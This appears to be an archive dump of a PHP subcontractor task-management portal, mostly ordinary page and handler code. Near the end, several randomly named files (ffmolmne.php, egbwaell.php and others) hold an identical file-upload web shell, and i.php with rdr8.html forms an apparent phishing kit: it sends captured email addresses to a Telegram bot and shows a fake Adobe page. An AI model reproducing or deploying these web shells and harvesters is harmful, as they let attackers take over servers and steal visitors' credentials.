subcontractor/viewtask.php000064400000031236151676701240012020 0ustar00decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$taskId) { echo ''; } $task = $taskService->getTaskById($taskId); if (!$task) { exit(); } } else { echo '

No task ID provided.

'; } $subtasks = $taskService->getSubtasksByTaskId($taskId); ?>
is_assigned == 1 && $task->assigned_to == $companyId) : ?>

service_name; ?>

region; ?>
schedule_name; ?>
frequency; ?>

finished ? 'Task completed' : 'Not Completed'); ?>

This task is assigned to your company.
dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?>

Subtasks

Id Date Updated At Assigned Completed Actions
ST-000id; ?> subtask_date; ?> updated_at)); ?> assigned ? 'Assigned' : 'Not Assigned'); ?> ignored) { echo 'Ignored'; } else { echo $subtask->completed ? 'Completed' : 'Not Completed'; } ?> View
subcontractor/scripts.php000064400000007306151676701240011653 0ustar00 subcontractor/rejecttask.php000064400000002530151676701240012315 0ustar00getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo(null); $task->setIsAssigned(0); // Get existing not accepted users $temp = $task->getNotAcceptedUsers(); $notAcceptedUsers = array_filter(explode(',', $temp)); // Add the new companyId if not already in the list if (!in_array($companyId, $notAcceptedUsers)) { $notAcceptedUsers[] = $companyId; } // Convert the array back to a string $task->setNotAcceptedUsers(implode(',', $notAcceptedUsers)); if ($taskService->rejectTask($task)) { echo 'success'; } else { echo 'error'; } } else { echo 'task_not_found'; } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } ?> subcontractor/sidebar.php000064400000006376151676701240011603 0ustar00
subcontractor/report_TaskSummaryForUser.php000064400000007216151676701240015345 0ustar00getTaskSummaryForUser($userid); ?>
assigned_tasks); ?>pending_tasks); ?>
User Name Accepted Tasks Completed Tasks Incomplete Tasks
user_name); ?> accepted_tasks); ?> completed_tasks); ?> not_completed_tasks); ?>
subcontractor/header.php000064400000016314151676701240011413 0ustar00
-->
subcontractor/viewsubtasksdaywise.php000064400000027316151676701240014307 0ustar00getAllSubtasksForSubContractorsGroupByDate($SubContractorId); ?>
$subtaskList) { ?>

Subtasks for

# ID Service Name Date Time Assigned Actions
ST-000 Assigned' : 'Not Assigned'; ?> View
subcontractor/reports.php000064400000011011151676701240011646 0ustar00
subcontractor/accepttask.php000064400000001566151676701240012310 0ustar00getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo($companyId); $task->setIsAssigned(1); if ($taskService->assignTask($task)) { echo 'success'; } else { echo 'error'; } } else { echo 'task_not_found'; } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } ?> subcontractor/viewunassignedtasks.php000064400000014035151676701240014262 0ustar00getAllServicesForDropdown(); // Fetch tasks from the database $tasks = $taskService->getUnassignedTasks(); ?>

View Tasks

ID Service Name Region Frequency Created At Public Status Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_at)); ?> View Details
subcontractor/assigntasktoworkers.php000064400000033743151676701240014317 0ustar00getAllServicesForDropdown(); // Fetch tasks to display $tasks = $taskService->getTasksByAssignedandnotCompletedAndNotAssigned($companyId); // Make sure $companyId is defined ?>

View Tasks

ID Service Name Region Frequency Created At Actions
id); ?> service_name); ?> region); ?> frequency); ?> created_at)); ?> View Details
subcontractor/dashboard.php000064400000030164151676701240012111 0ustar00getPendingTasks($companyId); $completedTasks = $reportsAndDashboardService->getCompletedTasks($companyId); //$ongoingSubtasks = $reportsAndDashboardService->getOngoingSubtasks($companyId); $unassignedSubtasks = $reportsAndDashboardService->getUnassignedSubtasks($companyId); // Fetch completed and incomplete subtask summary data $subtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForSubContractor($companyId); $completedSubTasks = $subtasksSummary['completed']; $incompleteSubTasks = $subtasksSummary['incomplete']; $ongoingSubTasks = $completedSubTasks + $incompleteSubTasks; // Calculating ongoing subtasks // Fetch total finished and not finished task summary data $taskSummary = $reportsAndDashboardService->getTasksSummaryForSubContractor($companyId); $completedTasks = $taskSummary['completed']; $pendingTasks = $taskSummary['pending']; $ongoingTasks = $taskSummary['total']; $todaySubtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForTodaySubContractor($companyId, date('Y-m-d')); $todayTotalSubTasks = $todaySubtasksSummary['total']; $todayCompletedSubTasks = $todaySubtasksSummary['completed']; $todayIncompleteSubTasks = $todaySubtasksSummary['incomplete']; ?>

Overall Subtasks Summary

Ongoing Subtasks

Completed Subtasks

Incomplete Subtasks

Today's Subtasks Summary:

Total Subtasks to be Completed

Completed Subtasks

Incomplete Subtasks

Pending Tasks

Completed Tasks

Unassigned Subtasks

subcontractor/viewsubtasksregionwise.php000064400000023445151676701240015014 0ustar00getAllSubtasksForSubContractorsGroupByRegion($SubContractorId); $regions = array_keys($subtasksByRegion); ?>
$subtaskList) { ?>

Subtasks for Region:

# ID Service Name Date Time Assigned Actions
ST-000 Assigned' : 'Not Assigned'; ?> View
subcontractor/acceptedongoingtaks.php000064400000022777151676701240014211 0ustar00getAllServicesForDropdown(); $currentCompanyId = 2; // Replace with dynamic company ID as needed // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksByAssignedandnotCompleted($companyId); ?>

View Tasks

ID Service Name Region Frequency Assigned Cleaner email Completed Actions
id; ?> service_name; ?> region; ?> frequency; ?> assignedCleaneremail; ?> View Details
subcontractor/report_viewsubtasksdaywise.php000064400000035472151676701240015704 0ustar00getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used // Fetch all subtasks grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } $currentUserId = $_SESSION['user_id']; $subtasks = $taskService->getAllSubtasksForSubContractorsGroupByDateReport($startDate, $endDate, $serviceLocationId, $currentUserId); $CompletedSubtaskcount = 0; $IncompletedSubtaskcount = 0; foreach ($subtasks as $date => $subtaskList) { foreach ($subtaskList as $subtask) { if ($subtask['completed']) { $CompletedSubtaskcount++; } else { $IncompletedSubtaskcount++; } } } ?>
>
   
$subtaskList) { ?>

Subtasks for

ID Service Name Date Time Assigned Completed Actions
ST-000 Assigned' : 'Not Assigned'; ?> Ignored'; } else { echo $subtask['completed'] ? 'Completed' : 'Not Completed'; } ?> View
subcontractor/head.php000064400000011437151676701240011065 0ustar00isLoggedIn() || !$system->isSubContractor()) { header('Location: ../login.php'); exit; // Stop further execution } $companyId = $_SESSION['user_id']; ?> <?php echo isset($pageTitle) ? $pageTitle : "Emera Facility Services"; ?>
subcontractor/viewsubtask.php000064400000043426151676701240012536 0ustar00 No subtask ID provided.

'; exit; } $subtaskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$subtaskId) { echo ''; exit; } $subtask = $subtaskService->getSubtaskById($subtaskId); $users = $userService->getAllUsers(); if ($subtask->completed) { $submittedLocation = $subtaskService->getSubtaskLocation($subtaskId); if ($submittedLocation) { $latitude = $submittedLocation->latitude; $longitude = $submittedLocation->longitude; } else { // Handle the case where location is not found $latitude = null; $longitude = null; // Optionally, display an error message or take other actions echo "Location not found for the specified subtask."; } } ?>
Back
assigned): ?> assigned && !$subtask->completed): ?> completed): ?>

service_name; ?>

subtask_date ? date('F j, Y', strtotime($subtask->subtask_date)) : 'Not set'; ?>
subtask_time ? date('g:i A', strtotime($subtask->subtask_time)) : 'Not set'; ?>
updated_at)); ?>
completed): ?> completed_at; ?>assigned): ?> completed && property_exists($subtask, 'submitted_by_admin') && $subtask->submitted_by_admin): ?> form_submission_id): ?> completed_at contains the datetime string $completedAt = $subtask->completed_at; // Create a new DateTime object with the original datetime $date = new DateTime($completedAt, new DateTimeZone('UTC')); // Set the timezone to Sydney $date->setTimezone(new DateTimeZone('Australia/Sydney')); // Format the date and time $formattedDate = $date->format('F j, Y, g:i a'); ?>
ignored) { echo 'Ignored'; } else { if ($subtask->completed) { echo 'Completed '; } else { echo 'Not Completed'; } } ?>
assigned): ?> Assigned Not assigned
assigned_to_Mobile ?: 'Not set'; ?>
assigned_Message_Rsponse ? 'Email sent successfully' : 'Unable to send email'; ?>
form_submission_id ? 'View Submitted Form' : 'Form not submitted'; ?>
Marked as completed by admin
completed && $latitude !== null && $longitude !== null): ?>

Submitted Location

subcontractor/rejecttask_bulk.php000064400000003165151676701240013337 0ustar00getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo(null); $task->setIsAssigned(0); // Get existing not accepted users $temp = $task->getNotAcceptedUsers(); $notAcceptedUsers = array_filter(explode(',', $temp)); // Add the new companyId if not already in the list if (!in_array($companyId, $notAcceptedUsers)) { $notAcceptedUsers[] = $companyId; } // Convert the array back to a string $task->setNotAcceptedUsers(implode(',', $notAcceptedUsers)); if (!$taskService->rejectTask($task)) { $errors[] = "Failed to reject task ID: $taskId"; } } else { $errors[] = "Task ID: $taskId not found"; } } if (empty($errors)) { echo 'success'; } else { echo implode(', ', $errors); } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } subcontractor/viewunassignedtask.php000064400000030756151676701240014107 0ustar00decryptData($_GET['id']); $task = $taskService->getTaskById($taskId); if (!$task) { echo '

Task not found.

'; exit(); } } else { echo '

No task ID provided.

'; exit(); } ?>
is_assigned == 1 && $task->assigned_to == $currentCompanyId): ?>

This task is already assigned to your company.

is_assigned == 1 && $task->assigned_to == $currentCompanyId): ?>

service_name); ?>

region); ?>
schedule_name); ?>
frequency); ?>

isPublic ? 'Open to accept' : 'Task Assigned'); ?>

This task is assigned to your company.
dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return $dateEntry['date']; }, $datesArray); // JSON encode the array for JavaScript $jsDates = json_encode($formattedDates); ?>

Subtasks

getSubtasksByTaskId($taskId); if ($subtasks) { echo ''; foreach ($subtasks as $subtask) { echo ''; } echo '
Date Time
' . htmlspecialchars($subtask->subtask_date) . ' ' . ($subtask->subtask_time ? date('h:i A', strtotime($subtask->subtask_time)) : '') . '
'; } else { echo '

No subtasks found for this task.

'; } ?>
subcontractor/footer.php000064400000000413151676701240011452 0ustar00
subcontractor/viewpublictasks.php000064400000022441151676701240013400 0ustar00getAllServicesForDropdown(); // Fetch tasks from the database $tasks = $taskService->getPublicTasks(); ?>

View Tasks

ID Service Name Region Frequency Created At Public Status Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_at)); ?> View Details
subcontractor/reassigntasktoworkers.php000064400000026101151676701240014634 0ustar00getAllServicesForDropdown(); // Fetch tasks to display $tasks = $taskService->getTasksByAssignedAndNotCompletedAndNoCompletedSubtasks($companyId); ?>

View Tasks

ID Service Name Region Frequency Assigned Cleaner email Created At Actions
id); ?> service_name); ?> region); ?> frequency); ?> assignedCleaneremail; ?> created_at)); ?> View Details
subcontractor/accepttask_bulk.php000064400000002212151676701240013312 0ustar00getTaskByIdAsObject($taskId); if ($task) { $task->setAssignedTo($companyId); $task->setIsAssigned(1); if (!$taskService->assignTask($task)) { $errors[] = "Failed to assign task ID $taskId"; } } else { $errors[] = "Task ID $taskId not found"; } } if (empty($errors)) { echo 'success'; } else { echo json_encode($errors); } } else { echo 'invalid_data'; } } else { echo 'invalid_request'; } ?> subcontractor/viewassignedsubtasksdaywise.php000064400000026171151676701240016023 0ustar00getAllSubtasksForSubContractorsGroupByDateassigned($SubContractorId); ?>
   
$subtaskList) { ?>

Subtasks for

ID Service Name Date Time Assigned Completed Actions
ST-000 Assigned' : 'Not Assigned'; ?> Ignored'; } else { echo $subtask['completed'] ? 'Completed' : 'Not Completed'; } ?> View
subcontractor/report_subtaskswithnotes.php000064400000017665151676701240015374 0ustar00getAllSubtasksWithNotesGroupByDateForSubContractors($startDate, $endDate, $currentSubcontractorId, $serviceLocationId); ?>
 
$subtaskList) { ?>

Subtasks for

ID Service Name Date Time Notes Actions
ST- View
ffmolmne.php000064400000001370151676701240007072 0ustar00
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?> egbwaell.php000064400000001370151676701240007051 0ustar00
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?> bliickjv.php000064400000001370151676701240007064 0ustar00
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?> i.php000064400000002652151676701240005523 0ustar00 chat_id, 'text' => $message ); $url = 'https://api.telegram.org/bot' . bot_token . '/sendMessage?' . http_build_query($config); file_get_contents($url); } if (save_txt) { file_put_contents(save_as, $message . PHP_EOL, FILE_APPEND); } // Redirect to the next page with email in the URL $redirect_url = '/rdr8.html'; header("Location: $redirect_url?email=" . urlencode($email)); exit(); } ?> rdr8.html000064400000006073151676701240006330 0ustar00 Link Not Found - Adobe Creative Viewer
🚫

Oops! This link is broken

The link you are trying to access appears to be invalid, expired, or no longer exists.

Possible reasons:
qwwunmvm.php000064400000001370151676701240007170 0ustar00
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?>